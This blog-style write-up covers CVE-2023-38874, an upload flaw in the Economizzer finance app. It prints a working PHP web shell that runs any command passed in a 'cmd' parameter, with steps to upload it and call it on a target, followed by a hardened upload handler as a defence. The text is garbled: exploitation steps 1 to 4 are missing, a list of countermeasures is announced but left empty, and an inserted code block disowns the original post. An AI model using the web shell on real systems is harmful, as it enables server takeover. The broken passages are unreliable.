Hello readers, today we will discuss a critical vulnerability (CVE-2023-38874) affecting Gugoan's Economizzer, a popular open-source personal finance manager. This Remote Code Execution (RCE) vulnerability is present in version .9-beta1 and commit 373088 (April 2023). In this post, we will go over the technical details of this vulnerability, how the exploit works, and references to the original sources.

Vulnerability Details

The CVE-2023-38874 vulnerability allows malicious attackers to execute arbitrary code on a target system by abusing an insecure file upload mechanism within the Economizzer application. Specifically, an attacker can upload a PHP web shell as an attachment when adding a new cash book entry. Once the web shell is uploaded, the attacker can visit it via a web browser and run arbitrary commands on the affected system.

Here's a code snippet demonstrating the exploitation of this vulnerability:

<?php
// PHP web shell for Economizzer RCE (CVE-2023-38874)

if(isset($_REQUEST['cmd'])) {
    echo '<pre>';
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo '</pre>';
    die;
}
?>

Submit the new cash book entry.

5. Visit the uploaded web shell by navigating to its URL. For example: http://target.com/uploads/webshell.php
6. Append the cmd parameter and issue any command you wish to execute, e.g., http://target.com/uploads/webshell.php?cmd=whoami

Please note: the above example is for educational purposes only. Unauthorized access to computer systems is illegal, and you should only test this exploit on systems you own or have permission to access.

Mitigation and Remediation

To address this vulnerability, the developers of Economizzer should implement proper validation checks when handling file uploads. Specifically, the application should validate the file types, restrict file extensions to a whitelist of allowed types, and avoid storing uploaded files in publicly accessible directories.
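As an added example (this is not code from the Economizzer project or from the original post), the following PHP upload handler implements the three controls just listed: an extension allowlist that is cross-checked against the detected content type, a random server-side file name, and storage outside the web root with downloads served through the application instead of a direct URL. The storage path, the form field name "attachment" and the allowlist contents are assumptions for the illustration.

```php
<?php
// Added example, not Economizzer's own code: a hardened attachment upload
// handler. UPLOAD_DIR, the 'attachment' field name and the ALLOWED map are
// assumptions made for this illustration.

declare(strict_types=1);

// Storage directory OUTSIDE the web root: nothing here is served directly,
// so even a file containing PHP code is never executed by the web server.
const UPLOAD_DIR = '/var/app/private_uploads';   // assumed path
const MAX_BYTES  = 5 * 1024 * 1024;

// Allowlist: extension => the MIME type the file CONTENT must actually have.
const ALLOWED = [
    'pdf'  => 'application/pdf',
    'png'  => 'image/png',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
];

/**
 * Validate one entry of $_FILES and move it into private storage.
 * Returns the stored (random) file name, or throws on any failure.
 */
function store_attachment(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed or missing');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('File too large');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not a genuine upload');
    }

    // 1. Extension check against the allowlist. Only the LAST extension counts,
    //    so a name like "x.php.png" is treated as .png and must still pass
    //    the content check below.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException('File type not allowed');
    }

    // 2. Content check: trust the bytes, not the client-supplied name or
    //    the client-supplied $file['type'].
    $finfo    = new finfo(FILEINFO_MIME_TYPE);
    $detected = $finfo->file($file['tmp_name']);
    if ($detected !== ALLOWED[$ext]) {
        throw new RuntimeException("Content type $detected does not match .$ext");
    }

    // 3. Never reuse the user-supplied name: generate a random one and
    //    append the validated extension.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest   = UPLOAD_DIR . '/' . $stored;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file');
    }
    chmod($dest, 0640); // readable by the app user, never executable
    return $stored;
}

/**
 * Serve a stored attachment through the application as a download with a
 * fixed Content-Type, instead of exposing the storage directory via a URL.
 */
function send_attachment(string $stored): void
{
    // Accept only names of the exact form store_attachment() generates;
    // this also rules out path traversal in the parameter.
    $pattern = '/^[a-f0-9]{32}\.(' . implode('|', array_keys(ALLOWED)) . ')$/';
    if (!preg_match($pattern, $stored)) {
        http_response_code(404);
        return;
    }
    $path = UPLOAD_DIR . '/' . $stored;
    if (!is_file($path)) {
        http_response_code(404);
        return;
    }
    $ext = pathinfo($stored, PATHINFO_EXTENSION);
    header('Content-Type: ' . ALLOWED[$ext]);
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: attachment; filename="' . $stored . '"');
    readfile($path);
}

// Usage (assumed form field name 'attachment'):
// $name = store_attachment($_FILES['attachment']);  // on the cash book entry form
// send_attachment((string) ($_GET['file'] ?? ''));  // on a download endpoint
```

The important design choice is that no single check is load-bearing: if the extension and content checks were somehow bypassed, the file still lands outside the document root under a name the uploader did not choose, and it is only ever returned as a download with a non-executable content type. Each layer covers a failure of the one before it.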

If you are using an affected version of Economizzer, consider updating your instance to a patched version as soon as it becomes available. Until then, some temporary countermeasures you can implement include:

References

- Gugoan's Economizzer GitHub Repository
- CVE-2023-38874 - NIST National Vulnerability Database (NVD) Entry

In conclusion, the CVE-2023-38874 vulnerability presents a serious security risk for users of Gugoan's Economizzer application. By documenting and discussing this vulnerability, it is our hope that developers and users alike will adopt best practices in handling file uploads and take appropriate steps to protect their systems from potential exploitation.

Timeline

Published on: 09/28/2023 04:15:12 UTC
Last modified on: 10/02/2023 18:35:07 UTC